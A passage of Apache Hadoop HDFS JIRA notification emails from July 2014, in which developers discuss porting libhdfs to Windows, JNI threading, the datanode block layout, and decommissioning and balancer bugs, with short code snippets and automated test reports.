> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6425) Large postponedMisreplicatedBlocks has impact on blockReport latency

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6425?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6425:
--

Summary: Large postponedMisreplicatedBlocks has impact on blockReport 
latency  (was: reset postponedMisreplicatedBlocks and 
postponedMisreplicatedBlocksCount when NN becomes active)

> Large postponedMisreplicatedBlocks has impact on blockReport latency
> 
>
> Key: HDFS-6425
> URL: https://issues.apache.org/jira/browse/HDFS-6425
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
>Assignee: Ming Ma
> Attachments: HDFS-6425.patch
>
>
> Sometimes we have large number of over replicates when NN fails over. When 
> the new active NN took over, over replicated blocks will be put to 
> postponedMisreplicatedBlocks until all DNs for that block aren't stale 
> anymore.
> We have a case where NNs flip flop. Before postponedMisreplicatedBlocks 
> became empty, NN fail over again and again. So postponedMisreplicatedBlocks 
> just kept increasing until the cluster is stable. 
> In addition, large postponedMisreplicatedBlocks could make 
> rescanPostponedMisreplicatedBlocks slow. rescanPostponedMisreplicatedBlocks 
> takes write lock. So it could slow down the block report processing.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6425) Large postponedMisreplicatedBlocks has impact on blockReport latency

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6425?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6425:
--

Status: Open  (was: Patch Available)

> Large postponedMisreplicatedBlocks has impact on blockReport latency
> 
>
> Key: HDFS-6425
> URL: https://issues.apache.org/jira/browse/HDFS-6425
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
>Assignee: Ming Ma
> Attachments: HDFS-6425.patch
>
>
> Sometimes we have large number of over replicates when NN fails over. When 
> the new active NN took over, over replicated blocks will be put to 
> postponedMisreplicatedBlocks until all DNs for that block aren't stale 
> anymore.
> We have a case where NNs flip flop. Before postponedMisreplicatedBlocks 
> became empty, NN fail over again and again. So postponedMisreplicatedBlocks 
> just kept increasing until the cluster is stable. 
> In addition, large postponedMisreplicatedBlocks could make 
> rescanPostponedMisreplicatedBlocks slow. rescanPostponedMisreplicatedBlocks 
> takes write lock. So it could slow down the block report processing.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081640#comment-14081640
 ] 

Stephen Bovy commented on HDFS-573:
---

Thanks Chris, 

We have had some offline discussions before.  Thanks for the explanation.

I have indeed added many enhancements.   I would need to get management 
permission to share these (sigh) :)  

I have added optional support for dynamically loading the JVM.  This simplifies 
build issues, and solves a lot of configuration
usage issues.  

I have indeed added an  optional  lib-init function  and have also added 
support for using a global static for the JVM pointer.

I have added support for a thread-flag, which can be statically set by the 
compiler or dynamically  set in the lib-init.

When the thread flag is not set  I use  a static global  to save the thread-env 
pointer which gets created when the jvm is 
created,  and I only need to utilize and access that one-pointer in one-place.

When the thread flag is not set, all the special thread code is bypassed with 
IF statements 

I have tested this in thread-mode with the thread-tester,  and of course I am 
using it  with  my app in non thread mode .

Works great either way.  




> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081637#comment-14081637
 ] 

Colin Patrick McCabe commented on HDFS-573:
---

bq. I am probably exposing my ignorance, so please forgive me. Are you saying 
that using JNI automatically implies and requires thread support

Yep, that's what I'm saying.

bq. and that every JNI call is running on a thread?

Not every JNI call runs in a different thread, but many HDFS JNI calls 
certainly do.  For example, {{hdfsWrite}} uses {{DFSOutputStream}}, which ends 
up starting a thread to write to the pipeline.

bq. From my very quick scan of the HADOOP-10388 branch, it looks like we'll be 
providing a clearer initialization sequence there. libhdfs likely will need to 
remain this way though.

I agree 100% that libhdfs should have had an "init" function that created some 
kind of context we could pass around.  But... we're going to try to keep the 
existing API in HADOOP-10388.  :P  Sorry, it's just really nice to keep 
compatibility where you can.

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Chris Nauroth (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081621#comment-14081621
 ] 

Chris Nauroth commented on HDFS-573:


I think there are 2 aspects to the question:

# libhdfs embeds a JVM.  The JVM itself always runs multiple internal threads, 
even if your libhdfs application code doesn't run multiple threads.  This means 
that by extension, a libhdfs application is always multi-threaded, even if the 
application's code is entirely single-threaded/synchronous.  This rules out 
things like linking to a single-threaded C runtime library for a supposed 
performance boost with single-core execution.  A libhdfs application must 
always link to a C runtime library with multi-threading support.
# As far as the data structures inside the libhdfs code itself, you're correct 
that there is no thread safety concern if the application runs entirely 
single-threaded and makes synchronous calls.  Technically, we don't need a lock 
around the hash table in that case.  However, it might just cause end user 
confusion if we publish thread-safe vs. non-thread-safe builds or some kind of 
configuration flag to skip the locking.  The effects of running multiple 
threads without the locking would be catastrophic, probably a crash of some 
sort.  I haven't personally seen contention on this lock cause a real-world 
performance bottleneck, so I wonder if such an optimization is necessary.

For the scope of this patch, I'd prefer to focus on a straight-up port of the 
existing code to work on Windows.  We're taking a big step here, moving from 
not even compiling on Windows to fully functional, and the patch is already 
pretty large.  :-)  Potential performance enhancements certainly are welcome in 
separate patches.

FWIW, I think libhdfs has a weakness in that it has no clear-cut "initialize" 
function for the application to call during a single-threaded bootstrap 
sequence.  This would have given us an easy place to start the {{JavaVM}} and 
pre-populate the mapping of class names to class references.  Unfortunately, it 
would be backwards-incompatible to add that function now and demand existing 
applications change their code to call our initialize function.  Instead, we 
have no choice but to do lazy initialization, and that drives a lot of the 
complexity in libhdfs with the mutexes and the thread-local storage.  From my 
very quick scan of the HADOOP-10388 branch, it looks like we'll be providing a 
clearer initialization sequence there.  libhdfs likely will need to remain this 
way though.

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081618#comment-14081618
 ] 

Colin Patrick McCabe commented on HDFS-6482:


Why don't we merge this to trunk and then open another JIRA to iron out any 
issues with rolling upgrades between different DN layout versions.  At minimum, 
we should decide whether we support rolling DN upgrades between different 
layout versions, and if we don't support it, give a clear failure message to 
admins.  But this patch is big enough that I don't think cramming all that into 
here is a good idea.  There also seem to be some issues with rolling DN 
downgrade now (for example, HDFS-6005 removed {{datanode \-rollingupgrade 
\-rollback}}, but not the usage text for it displayed in {{\-help}}.)

> Use block ID-based block layout on datanodes
> 
>
> Key: HDFS-6482
> URL: https://issues.apache.org/jira/browse/HDFS-6482
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6482-design.doc, HDFS-6482.1.patch, HDFS-6482.2.patch, 
> HDFS-6482.3.patch, HDFS-6482.4.patch, HDFS-6482.5.patch, HDFS-6482.6.patch, 
> HDFS-6482.7.patch, HDFS-6482.8.patch, HDFS-6482.9.patch, HDFS-6482.patch, 
> hadoop-24-datanode-dir.tgz
>
>
> Right now blocks are placed into directories that are split into many 
> subdirectories when capacity is reached. Instead we can use a block's ID to 
> determine the path it should go in. This eliminates the need for the LDir 
> data structure that facilitates the splitting of directories when they reach 
> capacity as well as fields in ReplicaInfo that keep track of a replica's 
> location.
> An extension of the work in HDFS-3290.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread James Thomas (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081607#comment-14081607
 ] 

James Thomas commented on HDFS-6482:


Or [~kihwal]?

> Use block ID-based block layout on datanodes
> 
>
> Key: HDFS-6482
> URL: https://issues.apache.org/jira/browse/HDFS-6482
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6482-design.doc, HDFS-6482.1.patch, HDFS-6482.2.patch, 
> HDFS-6482.3.patch, HDFS-6482.4.patch, HDFS-6482.5.patch, HDFS-6482.6.patch, 
> HDFS-6482.7.patch, HDFS-6482.8.patch, HDFS-6482.9.patch, HDFS-6482.patch, 
> hadoop-24-datanode-dir.tgz
>
>
> Right now blocks are placed into directories that are split into many 
> subdirectories when capacity is reached. Instead we can use a block's ID to 
> determine the path it should go in. This eliminates the need for the LDir 
> data structure that facilitates the splitting of directories when they reach 
> capacity as well as fields in ReplicaInfo that keep track of a replica's 
> location.
> An extension of the work in HDFS-3290.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread James Thomas (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081603#comment-14081603
 ] 

James Thomas commented on HDFS-6482:


[~sureshms] Is the documentation the Rollback section at 
http://hadoop.apache.org/docs/r2.4.0/hadoop-project-dist/hadoop-hdfs/HdfsRollingUpgrade.html
 correct? You are supposed to restart the DNs normally, without flags like 
"-rollback" or "-rollingupgrade rollback"? If you restart the DNs with 
"-rollback", everything should work normally and the previous directory should 
be restored with the old layout. [~arpitagarwal], any thoughts on this?

> Use block ID-based block layout on datanodes
> 
>
> Key: HDFS-6482
> URL: https://issues.apache.org/jira/browse/HDFS-6482
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6482-design.doc, HDFS-6482.1.patch, HDFS-6482.2.patch, 
> HDFS-6482.3.patch, HDFS-6482.4.patch, HDFS-6482.5.patch, HDFS-6482.6.patch, 
> HDFS-6482.7.patch, HDFS-6482.8.patch, HDFS-6482.9.patch, HDFS-6482.patch, 
> hadoop-24-datanode-dir.tgz
>
>
> Right now blocks are placed into directories that are split into many 
> subdirectories when capacity is reached. Instead we can use a block's ID to 
> determine the path it should go in. This eliminates the need for the LDir 
> data structure that facilitates the splitting of directories when they reach 
> capacity as well as fields in ReplicaInfo that keep track of a replica's 
> location.
> An extension of the work in HDFS-3290.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6791) A block could remain under replicated if all of its replicas are on decommissioned nodes

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6791?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6791:
--

Assignee: Ming Ma
  Status: Patch Available  (was: Open)

> A block could remain under replicated if all of its replicas are on 
> decommissioned nodes
> 
>
> Key: HDFS-6791
> URL: https://issues.apache.org/jira/browse/HDFS-6791
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
>Assignee: Ming Ma
> Attachments: HDFS-6791.patch
>
>
> Here is the scenario.
> 1. Normally before NN transitions a DN to decommissioned state, enough 
> replicas have been copied to other "in service" DNs. However, in some rare 
> situations, the cluster got into a state where a DN is in decommissioned 
> state and a block's only replica is on that DN. In such state, the number of 
> replication reported by fsck is 1; the block just stays in under replicated 
> state; applications can still read the data, given decommissioned node can 
> served read traffic.
> This can happen in some error situations such DN failure or NN failover. For 
> example
> a) a block's only replica is node A temporarily.
> b) Start decommission process on node A.
> c) When node A is in "decommission-in-progress" state, node A crashed. NN 
> will mark node A as dead.
> d) After node A rejoins the cluster, NN will mark node A as decommissioned. 
> 2. In theory, NN should take care of under replicated blocks. But it doesn't 
> for this special case where the only replica is on decommissioned node. That 
> is because NN has the policy of "decommissioned node can't be picked the 
> source node for replication".
> {noformat}
> BlockManager.java
> chooseSourceDatanode
>   // never use already decommissioned nodes
>   if(node.isDecommissioned())
> continue;
> {noformat}
> 3. Given NN marks the node as decommissioned, admins will shutdown the 
> datanode. Under replicated blocks turn into missing blocks.
> 4. The workaround is to recommission the node so that NN can start the 
> replication from the node.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6791) A block could remain under replicated if all of its replicas are on decommissioned nodes

2014-07-31 Thread Ming Ma (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6791?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ming Ma updated HDFS-6791:
--

Attachment: HDFS-6791.patch

The patch keeps the node in DECOMMISSION_INPROGRESS state if the node becomes 
dead during decommission. In that way, the decommission can resume when the 
node rejoins the cluster later.

> A block could remain under replicated if all of its replicas are on 
> decommissioned nodes
> 
>
> Key: HDFS-6791
> URL: https://issues.apache.org/jira/browse/HDFS-6791
> Project: Hadoop HDFS
>  Issue Type: Bug
>Reporter: Ming Ma
> Attachments: HDFS-6791.patch
>
>
> Here is the scenario.
> 1. Normally before NN transitions a DN to decommissioned state, enough 
> replicas have been copied to other "in service" DNs. However, in some rare 
> situations, the cluster got into a state where a DN is in decommissioned 
> state and a block's only replica is on that DN. In such state, the number of 
> replication reported by fsck is 1; the block just stays in under replicated 
> state; applications can still read the data, given decommissioned node can 
> served read traffic.
> This can happen in some error situations such DN failure or NN failover. For 
> example
> a) a block's only replica is node A temporarily.
> b) Start decommission process on node A.
> c) When node A is in "decommission-in-progress" state, node A crashed. NN 
> will mark node A as dead.
> d) After node A rejoins the cluster, NN will mark node A as decommissioned. 
> 2. In theory, NN should take care of under replicated blocks. But it doesn't 
> for this special case where the only replica is on decommissioned node. That 
> is because NN has the policy of "decommissioned node can't be picked the 
> source node for replication".
> {noformat}
> BlockManager.java
> chooseSourceDatanode
>   // never use already decommissioned nodes
>   if(node.isDecommissioned())
> continue;
> {noformat}
> 3. Given NN marks the node as decommissioned, admins will shutdown the 
> datanode. Under replicated blocks turn into missing blocks.
> 4. The workaround is to recommission the node so that NN can start the 
> replication from the node.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081569#comment-14081569
 ] 

Hadoop QA commented on HDFS-573:


{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658964/HDFS-573.1.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 6 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover
  org.apache.hadoop.hdfs.TestLeaseRecovery2

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7514//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7514//console

This message is automatically generated.

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081571#comment-14081571
 ] 

Hadoop QA commented on HDFS-6796:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658967/HDFS-6796.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 1 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:green}+1 findbugs{color}.  The patch does not introduce any new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7513//testReport/
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7513//console

This message is automatically generated.

> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6796.patch
>
>
> Currently balancer CLI parser simply checks if the total number of arguments 
> is greater than 2 inside the loop. Since the check does not include any loop 
> variables, it is not a proper check when there more than 2 arguments.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Stephen Bovy (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081555#comment-14081555
 ] 

Stephen Bovy commented on HDFS-573:
---

Thanks,

I am probably exposing  my ignorance, so please forgive me.   Are you saying 
that using JNI automatically implies and requires thread support, and that 
every JNI call is running on a thread?   

My hdfs client does  not use threads, so each hdfs call is  synchronous, and 
each jni call is also synchronous, and within the
context the code accessing the hash table should also be synchronous.  Please 
correct me gently if I am wrong :) 


> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Benoy Antony (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benoy Antony updated HDFS-6798:
---

Status: Patch Available  (was: Open)

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer makes a check to see if a block's location is a known data node. 
> But the variable it uses to check is wrong. This issue was fixed in HDFS-6364.
> There was no way to easily unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Updated] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Benoy Antony (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benoy Antony updated HDFS-6798:
---

Attachment: HDFS-6798.patch

The attached patch adds the unit test for HDFS-6364.

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer makes a check to see if a block's location is a known data node. 
> But the variable it uses to check is wrong. This issue was fixed in HDFS-6364.
> There was no way to easily unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.



--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Created] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Benoy Antony (JIRA)
Benoy Antony created HDFS-6798:
--

 Summary: Add test case for incorrect data node condition during 
balancing
 Key: HDFS-6798
 URL: https://issues.apache.org/jira/browse/HDFS-6798
 Project: Hadoop HDFS
  Issue Type: Improvement
  Components: balancer
Affects Versions: 2.4.1
Reporter: Benoy Antony
Assignee: Benoy Antony


The Balancer makes a check to see if a block's location is a known data node. 
But the variable it uses to check is wrong. This issue was fixed in HDFS-6364.
There was no way to easily unit test it at that time. Since HDFS-6441 enables 
one to simulate this case, it was decided to add the unit test once HDFS-6441 
is resolved.




--
This message was sent by Atlassian JIRA
(v6.2#6252)


[jira] [Resolved] (HDFS-6786) Fix potential issue of cache refresh interval

2014-07-31 Thread Colin Patrick McCabe (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6786?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Colin Patrick McCabe resolved HDFS-6786.


Resolution: Not a Problem

> Fix potential issue of cache refresh interval
> -
>
> Key: HDFS-6786
> URL: https://issues.apache.org/jira/browse/HDFS-6786
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: caching
>Affects Versions: 2.4.0
>Reporter: Yi Liu
>Assignee: Yi Liu
>
> In {{CacheReplicationMonitor}}, following code is try to check whether needs 
> to rescan every interval ms, if rescan takes n ms, then subtract n ms for the 
> interval. But if the delta <=0, it breaks and start rescan, there will be 
> potential issue: if user set the interval to a small value or rescan finished 
> after a while exceeding the interval, then rescan will happen in loop. 
> Furthermore, {{delta <= 0}} trigger the rescan should not be the intention, 
> since if needs rescan, {{needsRescan}} will be set.
> {code}
>  while (true) {
> if (shutdown) {
>   LOG.info("Shutting down CacheReplicationMonitor");
>   return;
> }
> if (needsRescan) {
>   LOG.info("Rescanning because of pending operations");
>   break;
> }
